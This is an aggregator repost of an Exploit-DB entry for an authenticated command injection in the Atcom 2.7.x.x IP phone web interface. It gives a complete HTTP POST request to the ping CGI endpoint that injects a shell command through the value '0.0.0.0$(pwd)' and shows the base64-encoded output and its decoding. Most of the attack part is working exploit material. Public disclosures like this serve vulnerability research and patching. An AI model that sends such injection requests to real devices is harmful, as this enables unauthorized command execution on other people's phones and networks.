6
[remote] Atcom 2.7.x.x - Authenticated Command Injection
source link: https://www.exploit-db.com/exploits/51742
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Atcom 2.7.x.x - Authenticated Command Injection
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link:
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
Exploit Request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
Response:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK